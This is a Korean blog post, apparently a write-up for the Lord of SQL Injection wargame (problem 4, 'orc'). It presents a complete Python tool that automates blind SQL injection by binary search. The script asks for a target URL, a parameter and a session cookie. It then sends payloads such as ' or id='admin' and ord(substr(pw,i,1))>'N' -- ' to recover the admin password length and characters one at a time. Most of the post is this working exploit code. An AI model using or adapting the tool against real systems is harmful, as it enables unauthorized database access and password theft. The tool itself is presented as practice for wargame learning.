Wargame/LOS(Lord of SQL Injection) Writeup
AUTO blind SQL Tools (이진탐색버전) (feat. LOS no.4 orc)
Ate1es
2022. 2. 17. 14:57
오랜만에 Blind Sql Injection 문제를 풀다가 문득 툴이 만들고 싶어졌다.
만들다 보니 전체탐색이 비효율적으로 보였다.
.
.
.
그리하여 탄생한 BLIND SQL TOOL 이진탐색 Veeeeeersion!!!!
코드주인의 능지 이슈로 인해 코드 수정을 안하면 los 4번문제에서 밖에 돌아가지 않는다.
앞으로 범용성있게 바꿀 예정, (오랜만에 블로깅하나 하려고 억지로 들고왔다는건 안비밀)
import requests
import time
# Request headers shared by every probe. input_data() overwrites the "cookie"
# entry with whatever the user types, so this is mutable module state, not a
# constant. Every probe is a plain GET whose query string carries the SQL
# condition verbatim, so a full run is reconstructable from the target's
# access logs; the oracle only exists where the server interpolates the
# parameter into SQL instead of binding it.
header = dict(cookie="")
def get_list():
    """Return the candidate character codes 23 through 122, inclusive.

    find_val() binary-searches over this list by index; find_length() only
    uses its size to bound the length search.
    """
    return list(range(23, 123))
def input_data():
    """Prompt for the run parameters and hand them to find_length().

    Prompts, in order: the target URL, the query-parameter name, a cookie
    string (stored into the module-level ``header`` dict) and a speed level
    1..3 that the search functions turn into a ``5 - speed`` second delay per
    request. Returns whatever find_length() returns.
    """
    for banner_line in ("[*] BlIND SQL TOOL [*]", "----------------------"):
        print(banner_line)
    url = input("[*] INPUT URL : ")
    param = input("[*] INPUT PARAMETER : ")
    cookie = input("[*] INPUT COOKIE(ex. SESSION=sess1234) : ")
    # int() may raise ValueError; header is only touched once all input is read.
    speed = int(input("[*] INPUT SPEED LEVEL (1[min], 2, 3[max]) : "))
    header["cookie"] = cookie
    return find_length(url, speed, param)
def find_length(URL, speed, param):
    """Binary-search the password length, issuing up to two GETs per step.

    Args:
        URL: base URL; the query string built here is appended verbatim.
        speed: speed level 1..3; each iteration sleeps ``5 - speed`` seconds.
        param: name of the query parameter the condition is placed in.

    The oracle is the literal string "Hello admin" in the response body.
    Returns whatever find_val() returns (it has no return statement, so None).
    """
    num_list = get_list()
    # Only the list's size matters here: it bounds the length search to 0..99.
    left = 0
    right = len(num_list)-1
    while left <= right:
        time.sleep(5-speed)
        mid = int((left + right) / 2)
        # Equality probe: is the length exactly `mid`?
        query = "?{}= ' or length(pw)={} -- '".format(param, mid)
        res = requests.get(URL+query, headers=header)
        if "Hello admin" in res.text:
            print("[*] Password Length : "+str(mid))
            break
        else:
            # Ordering probe decides which half of the range to keep.
            query = "?{}= ' or length(pw)>{} -- '".format(param, mid)
            res2 = requests.get(URL+query,headers=header)
            if "Hello admin" in res2.text:
                left = mid + 1
            else:
                right = mid - 1
    # NOTE(review): if no equality probe ever matched, the loop falls through
    # and the last probed `mid` is passed on unconfirmed. `mid` is always bound
    # because the body runs at least once (left=0 <= right=99).
    return find_val(URL, speed, mid, param)
def find_val(URL, speed, length, param):
    """Recover ``length`` characters, one binary search over get_list() each.

    Args:
        URL, speed, param: as in find_length().
        length: number of positions to probe; positions are 1-based in substr.

    Prints the running value after every recovered character. There is no
    return statement, so the caller receives None.
    """
    passwd = ""
    num_list = get_list()
    # These two assignments are dead: the loop below resets them per position.
    left = 0
    right = len(num_list)-1
    for i in range(1,length+1):
        left = 0
        right = len(num_list)-1
        while left <= right:
            time.sleep(5-speed)
            mid = int((left + right) / 2)
            # Equality probe on candidate code num_list[mid] for position i.
            query = "?{}=' or id='admin' and ord(substr(pw, {}, 1)) = '{}' -- '".format(param, i, num_list[mid])
            res3 = requests.get(URL+query, headers=header)
            if "Hello admin" in res3.text:
                passwd = passwd + chr(int(num_list[mid]))
                print("[*] Password : "+passwd)
                break
            else:
                # Ordering probe; the range narrows exactly as in find_length().
                query = "?{}=' or id='admin' and ord(substr(pw, {}, 1))>'{}' -- '".format(param, i, num_list[mid])
                res4 = requests.get(URL+query,headers=header)
                if "Hello admin" in res4.text:
                    left = mid + 1
                else:
                    right = mid - 1
    # NOTE(review): a position whose code lies outside 23..122 never matches,
    # so nothing is appended for it and the later characters shift left in
    # the printed value.
if __name__=="__main__":
    # Script entry point: the whole run is driven interactively by input_data().
    input_data()